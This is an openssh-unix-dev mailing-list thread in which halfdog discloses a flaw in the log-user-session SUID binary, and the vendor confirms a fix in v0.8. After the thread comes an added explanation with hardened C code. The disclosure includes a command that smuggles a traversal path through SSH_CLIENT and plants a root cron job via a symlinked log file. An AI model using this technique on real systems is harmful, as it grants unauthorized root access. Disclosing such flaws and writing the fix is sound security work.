Hi

Thank you for the audit. This issue has been rectified in the release v0.8.

Regards
Konrad

On 22.11.18 15:38, halfdog wrote:
> Hello,
>
> Konrad Bucheli writes:
> > Hi,
> >
> > Did you check out log-user-session [1]? It can be used to record the
> > output of ssh shell sessions in a tamper-proof way. And it is open source.
> > ...
> > [1] https://github.com/open-ch/log-user-session
>
> Well, using a SUID-binary in that way partially eliminates the benefits of
> tamper-proof logging by increasing the attack surface, e.g. by allowing each
> user to create arbitrary files using directory traversal and symlink
> attacks, e.g. by calling
>
>   SSH_CLIENT="169.254.0.1/../../../../tmp/ 1234 22" /usr/local/bin/log-user-session 'echo "* * * * * root /usr/bin/touch /dead.txt"'
>
> to start the directory traversal and lead to the problematic open missing
> O_NOFOLLOW:
>
>   5885 openat(AT_FDCWD, "/var/log/user-session/localhost-build-20181122-140817-169.254.0.1/../../../../tmp/-5883.log", O_WRONLY|O_CREAT|O_APPEND, 0400) = 3
>
> Without symlink protection, linking the "-[guessable pid].log" file to
> "/etc/cron.d/dead" will give you root easily. Even with protection,
> something should be possible ...
>
> I am currently also writing a tool for a similar reason. To be really
> tamper-proof, my solution is preloaded into SSH to intercept the encryption
> master key for each session, sends it to a daemon, that will use a public
> key to encrypt it and offload it to another machine. Together with the
> full-packet-captures of all SSH connections done by the network
> infrastructure, I would hope for a tamper-proof but still secure solution
> BUT (ha, ha, ha) - it is not ready yet.
>
> Best regards,
> hd
>
> > On 03.11.18 at 18:08, Kaushal Shriyan wrote:
> > > Hi,
> > >
> > > Are there any open source tools to keep track of ssh sessions? For
> > > example, if a specific user is logging in via ssh to a remote server,
> > > what commands or scripts are being run. Basically, I need to log all
> > > user sessions.
> > >
> > > Thanks in advance and I look forward to hearing from you.
> > >
> > > Best Regards,
> > > Kaushal
> > > _______________________________________________
> > > openssh-unix-dev mailing list
> > > openssh-unix-dev@xxxxxxxxxxx
> > > https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
> >
> > --
> > konrad bucheli
> > principal systems engineer
> > open systems ag
> > raeffelstrasse 29
> > ch-8045 zurich
> > t: +41 58 100 10 10
> > f: +41 58 100 10 11
> > kb@xxxxxxx
> > http://www.open.ch

--
konrad bucheli
principal systems engineer
open systems ag
raeffelstrasse 29
ch-8045 zurich
t: +41 58 100 10 10
f: +41 58 100 10 11
kb@xxxxxxx
http://www.open.ch
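The traversal and symlink problem halfdog describes above comes down to a SUID binary building a log path from the user-controlled SSH_CLIENT value and then opening it without O_NOFOLLOW or O_EXCL. The following is an added example of the hardened version of that open, not code from log-user-session or from anyone on this thread; it assumes a simplified file name of "<client>-<pid>.log" inside a log directory the program has already opened as a directory fd, and the function names are my own.

```c
/* Added example: hardened log-file creation for a SUID session logger.
   Assumed name "<client>-<pid>.log" inside a log directory opened as dirfd. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Allow only the characters of an IPv4/IPv6 literal, so no '/' and no path
   traversal. Scope-id forms (fe80::1%eth0) are rejected here by design. */
int valid_client_addr(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 45) return 0;            /* 45 = longest IPv6 text form */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isxdigit(c) || c == '.' || c == ':')) return 0;
    }
    return 1;
}

/* SSH_CLIENT is "addr port port" and is controlled by the caller of a SUID
   binary: take only the first field and validate it. Returns 1 if usable. */
int ssh_client_addr_ok(const char *ssh_client)
{
    char addr[64];
    if (ssh_client == NULL) return 0;
    size_t n = strcspn(ssh_client, " ");
    if (n == 0 || n >= sizeof addr) return 0;
    memcpy(addr, ssh_client, n);
    addr[n] = '\0';
    return valid_client_addr(addr);
}

/* Create the log inside dirfd. O_EXCL refuses a pre-planted file or symlink
   under the guessable pid-based name; O_NOFOLLOW refuses a symlink on the
   final component; the validated name cannot leave dirfd. Returns fd or -1. */
int open_session_log(int dirfd, const char *client, pid_t pid)
{
    char name[80];
    if (!valid_client_addr(client)) return -1;
    if (snprintf(name, sizeof name, "%s-%ld.log", client, (long)pid) >= (int)sizeof name)
        return -1;
    return openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0400);
}
```

The directory fd itself should be obtained with O_DIRECTORY | O_NOFOLLOW on a root-owned, non-world-writable path, so that neither the directory nor the final file can be redirected by the unprivileged caller.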